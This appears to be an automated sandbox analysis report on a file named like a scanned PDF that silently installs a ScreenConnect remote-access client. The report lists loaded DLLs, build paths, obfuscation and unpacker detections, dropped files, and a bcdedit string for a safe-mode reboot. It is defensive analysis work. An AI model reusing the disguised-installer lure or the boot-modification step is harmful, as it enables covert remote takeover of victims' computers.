Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: samlib.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: virtdisk.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: version.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: virtdisk.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: fltlib.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: Scan_PDF_5255303072.exe Static PE information: certificate valid
Source: Scan_PDF_5255303072.exe Static file information: File size 5685032 > 1048576
Source: Scan_PDF_5255303072.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x533200
Source: Scan_PDF_5255303072.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Scan_PDF_5255303072.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Scan_PDF_5255303072.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Scan_PDF_5255303072.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Scan_PDF_5255303072.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Scan_PDF_5255303072.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Scan_PDF_5255303072.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Scan_PDF_5255303072.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486417098.0000000002412000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbM source: Scan_PDF_5255303072.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: Scan_PDF_5255303072.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: Scan_PDF_5255303072.exe
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
Source: Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: Scan_PDF_5255303072.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2621215881.0000000002641000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1503870497.000000001B062000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486251470.00000000023D0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486728032.0000000002491000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: Scan_PDF_5255303072.exe
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1418668144.0000000000F3D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: Scan_PDF_5255303072.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1392487484.00000000041A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1390246679.0000000004310000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1390246679.00000000042A1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
Source: Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: Scan_PDF_5255303072.exe, 4a71ec.msi.3.dr, MSI74E9.tmp.3.dr, 4a71ee.msi.3.dr, MSI74FA.tmp.3.dr, 4a71ed.rbs.3.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1442912200.00000000003B2000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
Source: Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: Scan_PDF_5255303072.exe, 4a71ec.msi.3.dr, MSI6E42.tmp.2.dr, 4a71ee.msi.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: Scan_PDF_5255303072.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1486417098.0000000002412000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
Source: Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2638310867.0000000002C27000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1501555256.00000000124A0000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: Scan_PDF_5255303072.exe
Source: Scan_PDF_5255303072.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Scan_PDF_5255303072.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Scan_PDF_5255303072.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Scan_PDF_5255303072.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Scan_PDF_5255303072.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.0.Scan_PDF_5255303072.exe.8b78f8.3.raw.unpack, Program.cs .Net Code: Main System.Reflection.Assembly.Load(byte[])
PE file contains an invalid checksum
Source: Scan_PDF_5255303072.exe Static PE information: real checksum: 0x54fd91 should be: 0x57ab8f
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Code function: 0_2_01926F00 push eax; mov dword ptr [esp], ecx 0_2_01926F11
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Code function: 0_2_05AE53E8 push eax; retf 0_2_05AE54D9
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Code function: 0_2_05B02F58 push eax; mov dword ptr [esp], edx 0_2_05B02F6C
Source: C:\Users\user\Desktop\Scan_PDF_5255303072.exe Code function: 0_2_05B01A91 push eax; mov dword ptr [esp], ecx 0_2_05B01AA1
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_01AD7732 push eax; iretd 8_2_01AD7739
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_01AD7752 push 84041CCFh; iretd 8_2_01AD7759
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_043742C8 push ebx; ret 8_2_043742DA
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C07D0A pushad ; retf 8_2_05C07D11
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C07448 pushfd ; ret 8_2_05C07451
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C02032 push esp; ret 8_2_05C02043
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C07322 push eax; ret 8_2_05C07329
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C150A0 push edi; retn 5505h 8_2_05C150CE
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C1D070 push cs; ret 8_2_05C1D27A
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C135C8 push ebx; retn 0005h 8_2_05C135D2
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C135D7 push ebx; retn 0005h 8_2_05C135E2
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C135E7 push ebx; retn 0005h 8_2_05C135F2
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C1378F push edi; retn 0005h 8_2_05C1379A
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C1379F push edi; retn 0005h 8_2_05C137AA
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C13748 pushad ; retn 0005h 8_2_05C1376A
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C13643 push ecx; retn 0005h 8_2_05C1365A
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C1365F push edx; retn 0005h 8_2_05C1366A
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C1360F push esp; retn 0005h 8_2_05C1361A
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C13629 push ebp; retn 0005h 8_2_05C1362A
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C1362F push esp; retn 0005h 8_2_05C1361A
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C15D08 pushad ; ret 8_2_05C15D09
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Code function: 8_2_05C15D0B push esp; ret 8_2_05C15D11
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB100874E3 push ebx; iretd 9_2_00007FFB1008753A
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB10083BCA push FFFFFFE8h; retf 9_2_00007FFB10083CC1
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 9_2_00007FFB10438139 push ebx; ret 9_2_00007FFB1043813A
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFB10073BCB push FFFFFFE8h; retf 10_2_00007FFB10073CC1
Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Code function: 10_2_00007FFB100774E3 push ebx; iretd 10_2_00007FFB1007753A
Drops PE files
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsAuthenticationPackage.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7A98.tmp Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.Cab.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Core.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.Compression.dll Jump to dropped file
Source: C:\Windows\SysWOW64\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Windows.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI74FA.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Windows.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsCredentialProvider.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.InstallerActions.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsFileManager.exe Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\Microsoft.Deployment.WindowsInstaller.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Users\user\AppData\Local\Temp\MSI6E42.tmp-\ScreenConnect.Core.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.Client.dll Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsBackstageShell.exe Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7A98.tmp Jump to dropped file
Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI74FA.tmp Jump to dropped file
May use bcdedit to modify the Windows boot settings
Source: ScreenConnect.ClientService.dll.3.dr Binary or memory string: bcdedit.exeg/copy {current} /d "Reboot and Reconnect Safe Mode"7{.{8}-.{4}-.{4}-.{4}-.{12}}
Creates or modifies windows services
